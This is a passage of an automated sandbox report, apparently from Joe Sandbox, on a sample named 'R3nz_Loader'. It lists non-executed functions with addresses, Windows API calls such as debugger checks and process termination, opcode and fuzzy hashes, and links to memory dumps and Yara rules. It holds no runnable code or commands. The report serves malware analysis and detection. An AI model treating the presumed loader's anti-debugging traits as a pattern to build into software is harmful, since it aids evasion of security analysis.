                                                                              • Instruction ID: 1b96e35f0f0724e57fef3b592c48724fe6d41f032be4a07b631da01a2a05aa31
                                                                              • Opcode Fuzzy Hash: 8af45551fea44ff5d072a5296bad6856a26280021061e2863e475b9c468f28a4
                                                                              • Instruction Fuzzy Hash: E0F0B43371A22567FB115A269C02BCB77789F92768B318022E83997B80CB60D40782E2

                                                                              Non-executed Functions

                                                                              Function 6CEE43E0 Relevance: 7.7, Strings: 4, Instructions: 2656COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Yi4$Yi4$ko,r$0\r
                                                                              • API String ID: 0-151446381
                                                                              • Opcode ID: c60644e2e2e36cbd8d8c3931865fdcc1822dbccf767d7de4793e2d7bce683ff8
                                                                              • Instruction ID: ac168af0e0e8556e628421f9024655c9deff80ebdfb166739acaa6a18a4bf145
                                                                              • Opcode Fuzzy Hash: c60644e2e2e36cbd8d8c3931865fdcc1822dbccf767d7de4793e2d7bce683ff8
                                                                              • Instruction Fuzzy Hash: 1D132376B402158FCB08DE3CC9D17DD7BF2AB8B398F209255C519DBB95C63A994ACB00
                                                                              Function 6CEF3C6A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CEF3D62
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CEF3D6C
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CEF3D79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID: ,d`l
                                                                              • API String ID: 3906539128-3394741074
                                                                              • Opcode ID: 7542e420332b2dc04974ac65bb1dcb9c9205de64576623f2f047cb8bdb9b4627
                                                                              • Instruction ID: 06425822be7ce11e14a0dc29862b5c7ff36d8cd1847181dba4415e3ef6e70c80
                                                                              • Opcode Fuzzy Hash: 7542e420332b2dc04974ac65bb1dcb9c9205de64576623f2f047cb8bdb9b4627
                                                                              • Instruction Fuzzy Hash: 5F31C47490121CDBCB21DF68D8887CDBBB8BF48314F6041DAE42CA7650E7709B868F55
                                                                              Function 6CEF12DA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CEF12E6
                                                                              • IsDebuggerPresent.KERNEL32 ref: 6CEF13B2
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEF13D2
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6CEF13DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 254469556-0
                                                                              • Opcode ID: 8e63aa78fe22930b7498248576d36d488463e88cf0f15dbadb8f67deebf8ade7
                                                                              • Instruction ID: 72d0c6120216faaef4afcd4208b2cb8a5e495075215e36c41fc6f642bca0ece6
                                                                              • Opcode Fuzzy Hash: 8e63aa78fe22930b7498248576d36d488463e88cf0f15dbadb8f67deebf8ade7
                                                                              • Instruction Fuzzy Hash: 23311AB5D0521CDBDB10DFA4D9897CDBBB8BF08304F10419AE41DAB650EB719A858F44
                                                                              Function 6CEE7D90 Relevance: 5.6, Strings: 4, Instructions: 646COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q0($q0($JE*$JE*
                                                                              • API String ID: 0-2654902979
                                                                              • Opcode ID: 22cc395a2e1de9fdb8c244f879fffaac492311132ebc7052fe4ca7735816faa8
                                                                              • Instruction ID: bc140a97eaacccb8318331b3c88f28a56f2ecd67e57eb991fae28a565da78e58
                                                                              • Opcode Fuzzy Hash: 22cc395a2e1de9fdb8c244f879fffaac492311132ebc7052fe4ca7735816faa8
                                                                              • Instruction Fuzzy Hash: 7022F536F401058FCB08DEBCD5953DD77F2AB5B3A8F20961AD421EB795C62A890ACB50
                                                                              Function 00A43760 Relevance: 5.0, Strings: 2, Instructions: 2539COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$`
                                                                              • API String ID: 0-881360112
                                                                              • Opcode ID: 6a100f4532961838e52cb573d23a4a15cb0276d740c292417c27373ee4ad6a8e
                                                                              • Instruction ID: dfae75b1bbd59b0e42bb945103db464b4d1e3d4ead4d4a0cf5966a703a39621b
                                                                              • Opcode Fuzzy Hash: 6a100f4532961838e52cb573d23a4a15cb0276d740c292417c27373ee4ad6a8e
                                                                              • Instruction Fuzzy Hash: 8F331375D087908FDB10CB38C84579EBFF1AF96320F0982A9E4A99B3D2D7748945CB52
                                                                              Function 6CEF2A65 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,6CEF2A64,?,00000001,?,?), ref: 6CEF2A87
                                                                              • TerminateProcess.KERNEL32(00000000,?,6CEF2A64,?,00000001,?,?), ref: 6CEF2A8E
                                                                              • ExitProcess.KERNEL32 ref: 6CEF2AA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: d7f807176b5eea35a1eee7c6ec2da27fe156baaacc5f252d7e66eb6df51ae29e
                                                                              • Instruction ID: 2f0f10553579f09004c56c94d0862f92c578a2e7ad45ef7a3b2d83b8912ec787
                                                                              • Opcode Fuzzy Hash: d7f807176b5eea35a1eee7c6ec2da27fe156baaacc5f252d7e66eb6df51ae29e
                                                                              • Instruction Fuzzy Hash: EAE08631500688EFCF219F55C81CE893B39FB41249F214418F43886A20DB35D943CB50
                                                                              Function 00A40520 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: T$Y$\
                                                                              • API String ID: 0-3568914233
                                                                              • Opcode ID: 289b54b5aa3a9cca3ff882fe9fb226b49bd611fd193f30ec27574eaa8a03aed1
                                                                              • Instruction ID: 643ae8aad0a6e6a57aa6e0d37e3206ba1af531f7ba0296568270cec588c37d75
                                                                              • Opcode Fuzzy Hash: 289b54b5aa3a9cca3ff882fe9fb226b49bd611fd193f30ec27574eaa8a03aed1
                                                                              • Instruction Fuzzy Hash: 9861187690C7908FD7209B39C85179FBBE1ABD5324F298B2DD9E9D33C1D27489019B42
                                                                              Function 00A69620 Relevance: 3.3, Strings: 2, Instructions: 756COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EBC@$~%
                                                                              • API String ID: 0-3517279034
                                                                              • Opcode ID: 28bad57e38fdf365937965630dadb4b593b6e019008f50a13e5482edffe0111b
                                                                              • Instruction ID: 04496c93983efb9adbed115ddb88df9603520b7b57f008849deb7ada06ed2c2c
                                                                              • Opcode Fuzzy Hash: 28bad57e38fdf365937965630dadb4b593b6e019008f50a13e5482edffe0111b
                                                                              • Instruction Fuzzy Hash: 51322072A083518FE714CF29C8907ABBBE9EFC5314F188A2DF5959B291D774D805CB82
                                                                              Function 00A5EC40 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %D
                                                                              • API String ID: 0-2104738290
                                                                              • Opcode ID: 3a1542062994c36b8feb9df6d1f83420939c92f524d7e69ec6cb19f85882ebbb
                                                                              • Instruction ID: 53c3b13661170c49857d5dda960160ad10a0013ee8cd864e0a0c47474c344f9a
                                                                              • Opcode Fuzzy Hash: 3a1542062994c36b8feb9df6d1f83420939c92f524d7e69ec6cb19f85882ebbb
                                                                              • Instruction Fuzzy Hash: FF4203F4515B019FD365CF29D841A97BFEAEB8A310F25881EE0AE87350C7746502CF9A
                                                                              Function 6CEE1000 Relevance: 1.8, Strings: 1, Instructions: 556COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: w
                                                                              • API String ID: 0-476252946
                                                                              • Opcode ID: e3c94e219d299af9c5d7ff3e4faa21d14f1c1e7f92ba3f932babe35ae5b8fa4d
                                                                              • Instruction ID: 3dbf384d4b4159b06d85ebeab3e4f920881adf83f83503ee59a959b23ebdc204
                                                                              • Opcode Fuzzy Hash: e3c94e219d299af9c5d7ff3e4faa21d14f1c1e7f92ba3f932babe35ae5b8fa4d
                                                                              • Instruction Fuzzy Hash: 6C02C076B442018FDF08CFBCC4913DD7BF2AB5B398F209215D415E7B96C62AC94A8B54
                                                                              Function 6CEFA2F1 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CEFA2EC,?,?,00000008,?,?,6CEF9F84,00000000), ref: 6CEFA51E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              • Opcode ID: e0bb01eec0eaadfc4506a97ab79b0ce4ffd3a3fbd87249f0ddeec89f554e5baf
                                                                              • Instruction ID: 5535b7f6eead25e85151ce554eac706799792040bf5e10ffbfa622afaabef9db
                                                                              • Opcode Fuzzy Hash: e0bb01eec0eaadfc4506a97ab79b0ce4ffd3a3fbd87249f0ddeec89f554e5baf
                                                                              • Instruction Fuzzy Hash: A8B115316616088FD715CF28C486B997BB1FF45368F358658E8EACF6A1C335E992CB40
                                                                              Function 6CEF14A8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CEF14BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FeaturePresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 2325560087-0
                                                                              • Opcode ID: 8af1f5fb64a00dc7236eb5107fff487f22de79f6a409e4eeeb720b84f82eb462
                                                                              • Instruction ID: ad846570d6606582b71a6299ec9c730627856a555a72d25a9982061f46f7933b
                                                                              • Opcode Fuzzy Hash: 8af1f5fb64a00dc7236eb5107fff487f22de79f6a409e4eeeb720b84f82eb462
                                                                              • Instruction Fuzzy Hash: 4B5157B2E116198BEB05DF95C8817AEB7F0FB49348F24852AD426EB342D374D901CF90
                                                                              Function 6CEF4322 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 051615a093e74c408bd960ebca71f0e374c2b084c8907923c584d1ea5a6dc894
                                                                              • Instruction ID: 5234ad079ebcecb8db2ba65bae682df63c2839ea06b8643e89a7ed43bc2855bc
                                                                              • Opcode Fuzzy Hash: 051615a093e74c408bd960ebca71f0e374c2b084c8907923c584d1ea5a6dc894
                                                                              • Instruction Fuzzy Hash: 1541937580521CAFDB10DF69CD88AEAB7B9EF45308F2442DEE46DA3310DA359E858F10
                                                                              Function 00A4E9F0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ~
                                                                              • API String ID: 0-1707062198
                                                                              • Opcode ID: e01dc1cf355131fd5b00d80dda3b58d592975bb568c6896c4e48c7cfebd76166
                                                                              • Instruction ID: 04277c5eb1100065746dd81768a4fd2a6ecc3991dbc114d2f8b78bf80f5bc8e2
                                                                              • Opcode Fuzzy Hash: e01dc1cf355131fd5b00d80dda3b58d592975bb568c6896c4e48c7cfebd76166
                                                                              • Instruction Fuzzy Hash: E0811736A042614FC725CF28889136BBBE1BBC5364F19C67DECA99B382D6348C06D7D1
                                                                              Function 00A706A0 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 201e8040b6f915feab34fa91d52f5e721dcb99443d2d59c96e61e0ebdff6775c
                                                                              • Instruction ID: d744761fe5879a676aa4ffef20d1469ee4b81e0382b03279d721848ffa4d76a9
                                                                              • Opcode Fuzzy Hash: 201e8040b6f915feab34fa91d52f5e721dcb99443d2d59c96e61e0ebdff6775c
                                                                              • Instruction Fuzzy Hash: C131FC760083049BC318DF08C895A7BB7F5EB86314F25893DE68987390E775E948CBA6
                                                                              Function 6CEF584C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 51413299daddce5c1ee24f99848219ebcec7a83e5200dcc296a6754b9595c26a
                                                                              • Instruction ID: 636e4c1aeadfaa4693302570e3348b1d422566ebcaae06faa842a5e72a13e5bc
                                                                              • Opcode Fuzzy Hash: 51413299daddce5c1ee24f99848219ebcec7a83e5200dcc296a6754b9595c26a
                                                                              • Instruction Fuzzy Hash: F2A01130F002008B8B80AE30828A3083AF8AAA2AC030A8028A000C0000EA208080AA80
                                                                              Function 00A34910 Relevance: .7, Instructions: 670COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2fa82c68c24b8874b901a023218f5eed8a59bedb0710aa95e0bee418fbae580c
                                                                              • Instruction ID: 00aaa4cf7d082aee66f5fe98b6656228e7525a4955457210e5e5051f79b1221b
                                                                              • Opcode Fuzzy Hash: 2fa82c68c24b8874b901a023218f5eed8a59bedb0710aa95e0bee418fbae580c
                                                                              • Instruction Fuzzy Hash: A152C131A087458FCB19CF29C0906AAFBE1BF88314F198A6DF8D95B341D774E985CB81
                                                                              Function 00A38180 Relevance: .7, Instructions: 665COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e8e5edfccc045919d0803f05a7ac744621e8a0069b72612c0f0a780074fc01a5
                                                                              • Instruction ID: 2f3dfb5dc4120400382b18d5bb1a169c52459b720473d81f1a6a6df15b449c6b
                                                                              • Opcode Fuzzy Hash: e8e5edfccc045919d0803f05a7ac744621e8a0069b72612c0f0a780074fc01a5
                                                                              • Instruction Fuzzy Hash: 9552A2B0A08B849FE735CB34C4843A7BBE1AB91314F14496EF5E706782CB7DA985C752
                                                                              Function 00A38F60 Relevance: .6, Instructions: 627COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 86ab28a4bb83a9ba47d31c28d48431151dd7f33d37db9674ecadc46a4d583646
                                                                              • Instruction ID: e6eac04542fdf85d818f34d933c9ef88db63465aef0a68052f11e58de8fb5eb8
                                                                              • Opcode Fuzzy Hash: 86ab28a4bb83a9ba47d31c28d48431151dd7f33d37db9674ecadc46a4d583646
                                                                              • Instruction Fuzzy Hash: 0A12D6326087118BC725DF18D9816BBB3E2FFD4305F294A3DE9C697281D7B4A855CB82
                                                                              Function 00A35330 Relevance: .6, Instructions: 600COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 170eb48ded4fe5daa81098f43fdbce49959e78855f94ef2c3564cd3e587b70b6
                                                                              • Instruction ID: ad9b844059f7ad32546233a1c0e185e5789ac4ed7814835b67371aa274365aff
                                                                              • Opcode Fuzzy Hash: 170eb48ded4fe5daa81098f43fdbce49959e78855f94ef2c3564cd3e587b70b6
                                                                              • Instruction Fuzzy Hash: B732F270915F108FC378CF29C59052ABBF2BF45710BA44A2EE6A787A90D736F885DB10
                                                                              Function 00A50770 Relevance: .6, Instructions: 577COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                              • Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmpDownload File
